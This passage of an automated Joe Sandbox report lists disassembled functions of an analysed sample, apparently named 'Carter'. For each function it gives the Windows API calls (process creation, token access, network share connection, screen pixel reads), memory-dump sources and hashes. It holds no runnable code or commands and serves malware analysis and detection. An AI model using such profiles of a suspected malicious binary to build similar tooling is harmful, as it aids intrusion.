                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 6017e5103c484f2336162c299c53e05bad43363f6fd65085f2206d9888e2dd67
                                                                            • Instruction ID: c46bdf0aeea2ee20c606788034d046ffb98ac344660ecdc742d66883dd4739c5
                                                                            • Opcode Fuzzy Hash: 6017e5103c484f2336162c299c53e05bad43363f6fd65085f2206d9888e2dd67
                                                                            • Instruction Fuzzy Hash: 14114879911218FFEB11DF95C984F9DFBB8FB48710F204195E900B7290D671AE60DB90
                                                                            Function 00272111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                            • GetStockObject.GDI32(00000011), ref: 00272163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 1ce1a1a463e5a3311ea5a436b7d879c85c759947ad4315ba20ef235437784d1e
                                                                            • Instruction ID: c436e4f97402a1ed0477843e9a705f6acaba53584a4bf8a53ce8c2c1c31d0564
                                                                            • Opcode Fuzzy Hash: 1ce1a1a463e5a3311ea5a436b7d879c85c759947ad4315ba20ef235437784d1e
                                                                            • Instruction Fuzzy Hash: 40118B7211220ABFDB174F94DC95EEB7B6DFF58764F444102FA0852111C7319C60DBA0
                                                                            Function 002D1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D195E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D1983
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D198D
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,002D04EC,?,002D153F,?,00008000), ref: 002D19C0
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: bf637ba16b21c1947b04df0222954bbbcfdedcf30f43f9deb1e0f0d7bfb451ec
                                                                            • Instruction ID: b6f740104672fa8b24799008a80688e534b5cb1e8f43ad0b9df0993fda28dcb9
                                                                            • Opcode Fuzzy Hash: bf637ba16b21c1947b04df0222954bbbcfdedcf30f43f9deb1e0f0d7bfb451ec
                                                                            • Instruction Fuzzy Hash: 21112A31D2551DEBDF049FA5D9A8BEEBB78FF08751F004156E980B2245CB309A708B91
                                                                            Function 002FE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002FE1EA
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 002FE201
                                                                            • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 002FE216
                                                                            • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 002FE234
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: 69ff17c69ea51f65bea4c254214dc83cd15f923290a10245ee929b5e4d397011
                                                                            • Instruction ID: cc09379a0e2e8ce60f38f59e5966ea7c4d0e054dd320d3449b8fa6f992fd6919
                                                                            • Opcode Fuzzy Hash: 69ff17c69ea51f65bea4c254214dc83cd15f923290a10245ee929b5e4d397011
                                                                            • Instruction Fuzzy Hash: 2911A5B4212308DBE7318F51DD08FA3BBBCEF00B40F10856AAB15D6161E7B0E9149F91
                                                                            Function 002A71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: 7fd21d82ba1b1efda6174b1692edd29af057849f623a0c2c0e490c5b7bd51080
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: 7901783606814ABBCF126E84CC019EE3F26BB1A340B088555FE1858131CB36C9B1AB89
                                                                            Function 002FB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 002FB956
                                                                            • ScreenToClient.USER32(?,?), ref: 002FB96E
                                                                            • ScreenToClient.USER32(?,?), ref: 002FB992
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FB9AD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: a7e863960a0a5ded35cf66956f31aaa7c8fab0b9b047b89d4dbf3348c852aa91
                                                                            • Instruction ID: 71e4ad5eef67a59cb6b5bd22134f8c3868d1cf0906f326a75a348315182eaf90
                                                                            • Opcode Fuzzy Hash: a7e863960a0a5ded35cf66956f31aaa7c8fab0b9b047b89d4dbf3348c852aa91
                                                                            • Instruction Fuzzy Hash: C91132B9D0020EEFDB41CF98C984AEEFBB9FB48310F108166E914E3610D775AA658F50
                                                                            Function 002FBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002FBCB6
                                                                            • _memset.LIBCMT ref: 002FBCC5
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00338F20,00338F64), ref: 002FBCF4
                                                                            • CloseHandle.KERNEL32 ref: 002FBD06
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: c58be60c801ccf344c7f52b87a562de445a2b0896f5bac35ab75b46e33a6388c
                                                                            • Instruction ID: 966e0e97a42cd2cfcb2385e631837ca521ee4458830817ad512947705682d32b
                                                                            • Opcode Fuzzy Hash: c58be60c801ccf344c7f52b87a562de445a2b0896f5bac35ab75b46e33a6388c
                                                                            • Instruction Fuzzy Hash: 9BF082B65503047FE7526BA5BC85FBB3B5DEB08751F000421BA08D61A2DF714D2087A8
                                                                            Function 002D7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 002D71A1
                                                                              • Part of subcall function 002D7C7F: _memset.LIBCMT ref: 002D7CB4
                                                                            • _memmove.LIBCMT ref: 002D71C4
                                                                            • _memset.LIBCMT ref: 002D71D1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 002D71E1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 4eaeae436df5c920d87c41957c9a1e30873fbcc6a6b9be3bef442552107a6289
                                                                            • Instruction ID: f29644791ba8e2c61c2bc9897c2684ac6f12f0eda261366c709698a090cad2e8
                                                                            • Opcode Fuzzy Hash: 4eaeae436df5c920d87c41957c9a1e30873fbcc6a6b9be3bef442552107a6289
                                                                            • Instruction Fuzzy Hash: 74F05E3A211100ABCF066F95DC85B4ABB29EF45320F08C052FE085E22ACB31A921DFB4
                                                                            Function 002FC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271738
                                                                              • Part of subcall function 002716CF: BeginPath.GDI32(?), ref: 0027174F
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002FC3E8
                                                                            • LineTo.GDI32(00000000,?,?), ref: 002FC3F5
                                                                            • EndPath.GDI32(00000000), ref: 002FC405
                                                                            • StrokePath.GDI32(00000000), ref: 002FC413
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: e40a51af39a7d3e4c762122578525b137d81eefd8292c1ab59262a842c32d39c
                                                                            • Instruction ID: 493dbe2a83918145399588a5b469b3f11f4c1c04ad024e5206f6b8ce8525e9c5
                                                                            • Opcode Fuzzy Hash: e40a51af39a7d3e4c762122578525b137d81eefd8292c1ab59262a842c32d39c
                                                                            • Instruction Fuzzy Hash: 15F0BE3100621DBAEB232F54AC1EFDE3F9DAF05310F048001FB11251E187B41560DFA9
                                                                            Function 002CAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002CAA6F
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 002CAA82
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002CAA89
                                                                            • AttachThreadInput.USER32(00000000), ref: 002CAA90
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 057af1df3f5ea125c1fc5832836b9c84b131d7e660d3699f9a41d63c1db26fca
                                                                            • Instruction ID: 55d9b45588c7dc1a69febddc5a2ef06542d913736de6ac2f50cc83843808fa54
                                                                            • Opcode Fuzzy Hash: 057af1df3f5ea125c1fc5832836b9c84b131d7e660d3699f9a41d63c1db26fca
                                                                            • Instruction Fuzzy Hash: 44E0393154222CBADB225FA29D1CFEB3F6DEF157A1F008116F50984060CA728560CBA0
                                                                            Function 002725F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0027260D
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00272617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0027262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00272634
                                                                            • GetWindowDC.USER32(?,00000000), ref: 002AC1C4
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002AC1D1
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 002AC1EA
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 002AC203
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 002AC223
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AC22E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: 18f4b9008efc0f04541ebc3bd8c63239f3923eb310471a8ebc17e36d10b31f52
                                                                            • Instruction ID: 171e8cb766d8a57f0c21a7ca259437789a959d927c355efb06fb461265a82f5d
                                                                            • Opcode Fuzzy Hash: 18f4b9008efc0f04541ebc3bd8c63239f3923eb310471a8ebc17e36d10b31f52
                                                                            • Instruction Fuzzy Hash: 9FE06D35605244BBDB2A5FB8AC09BD83B19EB16332F148367FA69480E18B7149A0DB11
                                                                            Function 002C9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 002C9339
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,002C8F04), ref: 002C9340
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002C8F04), ref: 002C934D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,002C8F04), ref: 002C9354
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 6d968a4d77fb90156b66d5a395ac562b28db9a3becf3381354094b384c935b73
                                                                            • Instruction ID: c09786e3292c2a7c817d5d2b3341a35aa12e45d0fe3b4c0cf079676188c3a410
                                                                            • Opcode Fuzzy Hash: 6d968a4d77fb90156b66d5a395ac562b28db9a3becf3381354094b384c935b73
                                                                            • Instruction Fuzzy Hash: 48E04676602212ABD7261FF1AD0DB563BACBF507A2F108859B285CA090EA389484CB64
                                                                            Function 002B0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 002B0679
                                                                            • GetDC.USER32(00000000), ref: 002B0683
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002B06A3
                                                                            • ReleaseDC.USER32(?), ref: 002B06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 00d1a182402f18f44b9e539a4cfc4ebedf2efcf4d0f32618828cb77a4ac9cfd3
                                                                            • Instruction ID: 13248862330182c60e79303d681fd7be1f3aef9fc4082ccadc46f8adc8f0cfbf
                                                                            • Opcode Fuzzy Hash: 00d1a182402f18f44b9e539a4cfc4ebedf2efcf4d0f32618828cb77a4ac9cfd3
                                                                            • Instruction Fuzzy Hash: 4AE01A71811608EFCB069FA0D818B9D7BFAEB8C350F11C006F95AA7210CB7985619F50
                                                                            Function 002B068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 002B068D
                                                                            • GetDC.USER32(00000000), ref: 002B0697
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002B06A3
                                                                            • ReleaseDC.USER32(?), ref: 002B06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 0c0a6bbe4e7d1e67e30d92287068a2b0e384d473ba43557574b79eb55fd8e9aa
                                                                            • Instruction ID: b5651a43725671a5d1176fdff3b025c64087b2fc1dc611fd1ff976acfacef2c3
                                                                            • Opcode Fuzzy Hash: 0c0a6bbe4e7d1e67e30d92287068a2b0e384d473ba43557574b79eb55fd8e9aa
                                                                            • Instruction Fuzzy Hash: D4E01A71801608EFCB169F60D81875D7BFAEB8C314F108006F959A7210CB7995518F50
                                                                            Function 002DB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • __wcsnicmp.LIBCMT ref: 002DB670
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002DB739
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: dad9eb52265aa3c8c12a335ea154dcc8c338c89606a91fc0b1f45c73fb477e2e
                                                                            • Instruction ID: f1f73f7943bea084507d4d0c910bf38154f4d4dae46f2c36ac67845e6295d6e5
                                                                            • Opcode Fuzzy Hash: dad9eb52265aa3c8c12a335ea154dcc8c338c89606a91fc0b1f45c73fb477e2e
                                                                            • Instruction Fuzzy Hash: 9A619376A20215EFDB15EF54C891EAEB7B4EF48310F11805AF54AAB391D770AE50CF90
                                                                            Function 002B7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: #V(
                                                                            • API String ID: 4104443479-471757699
                                                                            • Opcode ID: a7eec21b072e8476cf5dba321e76275386dfefaa2f46d491f49158c3e00d5aad
                                                                            • Instruction ID: ca4cd944769aaea418bd648ff1be74e65e2465ea5e948b38a6a21bf860771a13
                                                                            • Opcode Fuzzy Hash: a7eec21b072e8476cf5dba321e76275386dfefaa2f46d491f49158c3e00d5aad
                                                                            • Instruction Fuzzy Hash: A251727092460ADFCF64CFA8C880AEEBBF1FF45344F248529E85AD7250E731A965CB51
